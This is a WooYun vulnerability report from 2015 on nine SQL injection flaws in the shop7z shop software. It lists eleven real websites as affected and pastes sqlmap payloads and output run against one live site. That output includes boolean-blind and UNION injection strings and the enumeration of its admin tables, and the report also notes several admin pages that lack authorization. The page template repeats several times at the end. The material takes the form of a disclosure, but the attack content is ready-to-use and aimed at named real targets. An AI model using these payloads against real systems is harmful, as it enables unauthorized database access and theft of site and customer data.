shop7z九处SQL注入打包 | wooyun-2015-0109753| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0109753

漏洞标题：shop7z九处SQL注入打包

漏洞作者： gobal

提交时间：2015-04-23 15:21

修复时间：2015-06-07 15:22

公开时间：2015-06-07 15:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-23：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-06-07：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

shop7z九处SQL注入打包提交好几次了虽然很累不过想到审核的哥们要审核那么多洞自己的累确实不算什么

详细说明：

案例：
http://www.gzsewing.com
http://www.125309.com
http://www.nm3g.org
http://35dianqi.com
http://www.ai04.com
http://www.longmm.net
http://www.99pwan.com
http://www.heimawg.com
http://www.hzjdpm.cn
http://ptwb.net
http://5lmm.cn
#1
漏洞文件：/admin/dingdan_sendnot.asp
问题参数：id【POST下】
TEST：http://www.125309.com/admin/dingdan_sendnot.asp

id=1

Place: POST
Parameter: id
    Type: boolean-based blind
    Title: Microsoft Access boolean-based blind - Parameter replace (original va
lue)
    Payload: id=IIF(2159=2159,1,1/0)
---
[19:37:57] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:37:57] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[19:37:57] [INFO] fetching number of tables for database 'Microsoft_Access_maste
rdb'
[19:37:57] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[19:37:57] [INFO] retrieved:
[19:37:58] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[19:37:58] [WARNING] unable to retrieve the number of tables for database 'Micro
soft_Access_masterdb'
[19:37:58] [ERROR] cannot retrieve table names, back-end DBMS is Access
do you want to use common table existence check? [Y/n/q] y
[19:38:01] [INFO] checking table existence using items from 'D:\python\sqlmap\tx
t\common-tables.txt'
[19:38:01] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 9
[19:38:01] [INFO] starting 9 threads
[19:38:06] [INFO] retrieved: admin
[19:38:23] [INFO] retrieved: article
[19:40:37] [INFO] retrieved: ad
[19:41:05] [INFO] retrieved: message
Database: Microsoft_Access_masterdb
[4 tables]
+---------+
| ad      |
| admin   |
| article |
| message |
+---------+

#2
漏洞文件：/admin/lipindel.asp【存在越权】
问题参数：id
TEST：http://www.125309.com/admin/lipindel.asp?id=1

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: Microsoft Access boolean-based blind - Parameter replace (original va
lue)
    Payload: id=IIF(1449=1449,1,1/0)
---
[19:46:56] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:46:56] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp
ut\www.125309.com'
[*] shutting down at 19:46:56

#3
漏洞文件：/show.asp?tk=shop7z
问题参数：pkid【POST下】
TEST:http://www.125309.com/show.asp?tk=shop7z

pkid=1

Place: POST
Parameter: pkid
    Type: UNION query
    Title: Generic UNION query (NULL) - 38 columns
    Payload: pkid=-2466 UNION ALL SELECT CHR(58)&CHR(120)&CHR(108)&CHR(112)&CHR(
58)&CHR(111)&CHR(71)&CHR(69)&CHR(101)&CHR(89)&CHR(81)&CHR(101)&CHR(74)&CHR(104)&
CHR(110)&CHR(58)&CHR(99)&CHR(106)&CHR(99)&CHR(58),NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM
MSysAccessObjects%00
---
[19:48:36] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:48:36] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp
ut\www.125309.com'
[*] shutting down at 19:48:36

#4
漏洞文件：orderpro_del.asp
问题参数：id
TEST:http://www.125309.com/orderpro_del.asp?id=1

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: Microsoft Access boolean-based blind - Parameter replace (original va
lue)
    Payload: id=IIF(2623=2623,1,1/0)
---
[19:50:23] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft Access
[19:50:23] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp
ut\www.125309.com'
[*] shutting down at 19:50:23

#5
漏洞文件：show_foot.asp
问题参数：c_id
TEST：http://www.125309.com/show_foot.asp?c_id=1

Place: GET
Parameter: c_id
    Type: boolean-based blind
    Title: Microsoft Access boolean-based blind - Parameter replace (original va
lue)
    Payload: c_id=IIF(3932=3932,1,1/0)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: c_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(58)&CHR(104)&CHR(11
5)&CHR(121)&CHR(58)&CHR(115)&CHR(90)&CHR(101)&CHR(90)&CHR(89)&CHR(79)&CHR(67)&CH
R(102)&CHR(120)&CHR(119)&CHR(58)&CHR(102)&CHR(113)&CHR(107)&CHR(58),NULL,NULL,NU
LL,NULL,NULL,NULL FROM MSysAccessObjects%00
---
[19:51:54] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:51:55] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp
ut\www.125309.com'
[*] shutting down at 19:51:55

#6
漏洞文件：showone.asp
问题参数：l_id
TEST:http://www.125309.com/showone.asp?l_id=1

Place: GET
Parameter: l_id
    Type: boolean-based blind
    Title: Microsoft Access boolean-based blind - Parameter replace (original va
lue)
    Payload: l_id=IIF(9827=9827,1,1/0)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: l_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(58)&CHR(122)&CHR(10
2)&CHR(104)&CHR(58)&CHR(113)&CHR(87)&CHR(69)&CHR(120)&CHR(108)&CHR(79)&CHR(88)&C
HR(86)&CHR(109)&CHR(116)&CHR(58)&CHR(106)&CHR(116)&CHR(122)&CHR(58),NULL,NULL,NU
LL,NULL,NULL,NULL FROM MSysAccessObjects%00
---
[19:53:38] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:53:38] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp
ut\www.125309.com'
[*] shutting down at 19:53:38

#7
漏洞文件：/admin/dingdan_detail.asp【存在越权】
问题参数：id
TEST:http://www.125309.com/admin/dingdan_detail.asp?id=1

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 9606=9606
---
[19:54:50] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:54:50] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp
ut\www.125309.com'
[*] shutting down at 19:54:50

漏洞证明：

#8
漏洞文件：/admin/chongzhimodify.asp【存在越权】
问题参数：id【POST下】
TEST:http://www.125309.com/admin/chongzhimodify.asp

id=1

Place: POST
Parameter: id
    Type: boolean-based blind
    Title: Microsoft Access boolean-based blind - Parameter replace (original va
lue)
    Payload: id=IIF(3785=3785,1,1/0)
---
[19:58:56] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:58:56] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 85 times
[19:58:56] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp
ut\www.125309.com'
[*] shutting down at 19:58:56

还有处不确定不过应该是注入
#9
漏洞文件：/admin/zhfbili.asp【存在越权】
问题参数：zhfbili【POST下】
TEST:http://www.125309.com/admin/zhfbili.asp

zhfbili=1'&Submit=+%B1%A3%B4%E6+&ok=1

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误 在查询表达式 ''1''' 中。
/admin/zhfbili.asp，行 77

修复方案：

版权声明：转载请注明来源 gobal@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

漏洞评价：

2015-04-24 07:26 | 微笑Style ( 路人 | Rank:0 漏洞数:2 | 代码爱好者)

网趣的我也提交了，我的为啥迟迟不审核

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0109753

漏洞标题：shop7z九处SQL注入打包

相关厂商：shop7z

漏洞作者： gobal

提交时间：2015-04-23 15:21

修复时间：2015-06-07 15:22

公开时间：2015-06-07 15:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 gobal@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0109753

漏洞标题：shop7z九处SQL注入打包

相关厂商：shop7z

漏洞作者： gobal

提交时间：2015-04-23 15:21

修复时间：2015-06-07 15:22

公开时间：2015-06-07 15:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0109753"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 gobal@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：